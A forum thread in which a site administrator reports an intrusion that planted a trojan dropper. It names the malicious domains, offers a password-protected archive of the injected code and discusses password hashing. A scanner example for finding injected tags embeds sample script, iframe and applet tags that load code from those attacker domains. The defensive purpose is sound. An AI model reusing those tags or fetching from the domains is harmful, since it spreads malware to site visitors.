Malicious script inserted into our site

Status
Not open for further replies.

Rollyco

Team Tomoe
Oct 4, 2007
www.yamanakatomoe.com
Sorry for the downtime, everyone.

We suffered an intrusion and had to shut the site down in order to conduct a security audit. It took so long because real-life responsibilities were taking up all of my time.

The attacker inserted a trojan dropper into the site. You may have noticed antivirus warnings while browsing the site. We don't know the exact nature of the trojan, but if you regularly visit Akiba-Online with an old version of your browser or Java/Flash/etc. plugins, or noticed strange prompts, you might want to conduct a full system scan to ensure that you weren't infected with anything.

The attacker also had access to the database. If you have an easy-to-guess password on Akiba-Online, you might want to change it. Also, if you use the same password on other sites, you may want to visit those sites and change the password.

FYI: a good password is randomly generated, at least 14 characters long, and used only on one site. Google search for "random password generator".

If you have any concerns or comments, post in this thread.
 
For those that are interested, the malicious domains were akiba-online[dot]ipq[dot]co and xxl[dot]collegeslutz[dot]com. Do not visit those sites unless you know what you're doing. They are dangerous.

Attached to this post is the malicious JavaScript inserted into our pages and a Java applet downloaded by the dropper. The archive password is VIRUS. Do not download unless you know what you're doing. If anybody wants to take a look and comment, feel free. (Java developers, can you deobfuscate?)
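A practical check for an injection like the one described in the post above is to scan the site's pages and templates for script, iframe, applet or object tags that pull code from a host the site does not own. The scanner below is an added example, not the site's own tooling or the attached payload: the two hostnames are the ones named in the post, while the allowlist, the sample page and its line layout are constructed for illustration.

```python
"""Find tags that load code from hosts outside an allowlist.

Added example. The malicious hostnames are the ones named in the
thread; ALLOWED_HOSTS and SAMPLE_PAGE are constructed for the demo.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately loads code from (constructed allowlist).
ALLOWED_HOSTS = {"akiba-online.com", "www.akiba-online.com"}

# Tag -> attributes through which remote code is typically pulled in.
CODE_ATTRS = {
    "script": ("src",),
    "iframe": ("src",),
    "applet": ("codebase", "archive"),
    "object": ("data", "codebase"),
    "embed": ("src",),
}


class InjectedCodeFinder(HTMLParser):
    """Collects (line, tag, url) for code-loading tags on foreign hosts."""

    def __init__(self, allowed):
        super().__init__()
        self.allowed = {h.lower() for h in allowed}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        wanted = CODE_ATTRS.get(tag)
        if not wanted:
            return
        for name, value in attrs:
            if name not in wanted or not value:
                continue
            # urlparse handles absolute and protocol-relative (//host/..) URLs;
            # relative paths have no host and are served by our own server.
            host = urlparse(value.strip()).hostname
            if host and host.lower() not in self.allowed:
                self.findings.append((self.getpos()[0], tag, value))


def find_injected(html, allowed=ALLOWED_HOSTS):
    """Return [(line, tag, url), ...] for every foreign code reference."""
    parser = InjectedCodeFinder(allowed)
    parser.feed(html)
    parser.close()
    return parser.findings


def injected_hosts(html, allowed=ALLOWED_HOSTS):
    """Sorted list of the foreign hosts a page loads code from."""
    return sorted({urlparse(url).hostname.lower()
                   for _, _, url in find_injected(html, allowed)})


# Constructed page: one legitimate vBulletin script plus three injected
# references to the domains named in the thread.
SAMPLE_PAGE = """<html><head>
<script type="text/javascript" src="/clientscript/vbulletin_global.js"></script>
<script type="text/javascript" src="http://akiba-online.ipq.co/in.js"></script>
</head><body>
<iframe src="//xxl.collegeslutz.com/x.php" width="1" height="1"></iframe>
<applet code="Main.class" archive="http://xxl.collegeslutz.com/a.jar"></applet>
</body></html>"""

if __name__ == "__main__":
    for line, tag, url in find_injected(SAMPLE_PAGE):
        print(f"line {line}: <{tag}> loads {url}")
```

Run it over every template and static HTML file in the web root (and over a fetched copy of a live page, since the injection may be added at request time by a modified PHP file rather than stored in a template); anything it reports that is not on the allowlist deserves a look, and the allowlist itself should be kept short.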
 
Thank you

Thank you for taking time to root out the virus, malware, etc. I have noticed, unrelated to this I am sure, that my Google/Chrome browsing is often redirected to tell me "this page cannot be displayed" or some variation of the message. I guess after a while it comes with the territory? Such is life! Compared to not too many years ago, browsing is much quicker even with dealing with these annoyances. Still...
Jim
 
Yes, the passwords are hashed using a md5(md5($pass).$uniquesalt) scheme. However, GPU brute-forcing can crack short passwords and easy-to-guess passwords rather quickly. An nVidia GTX250 can hash 140 million vBulletin passwords per second.
 
Would a 9 character password be considered short? o.o Also, thanks for letting us know.
 
Would a 9 character password be considered short?
That depends. "iloveyou1" is too easy to crack. "xoF$^JX63" is adequate. If your account is valuable in some way (you are staff, or you have enemies), 9 random characters are absolutely not enough.
 
was the intrusion due to an already known VB vulnerability (without going into details)?
 
good job. good job ^___^.

Thank you, rollyco & others, for your constant hard efforts to keep this site going.
 
Can only access the site through Google. Typing "akiba-online.com", which always opened the site, now displays only a blank page with "akiba-online is back" in the upper-left corner.
 
I got :scared: not because of the hacker... but because I can't access any good porn for the past 2 days :pandalaugh:

Ahahahha anyway... It's a good thing he didn't flush the account database :rofl:
 
Can only access the site through Google. Typing "akiba-online.com", which always opened the site, now displays only a blank page with "akiba-online is back" in the upper-left corner.

same here
 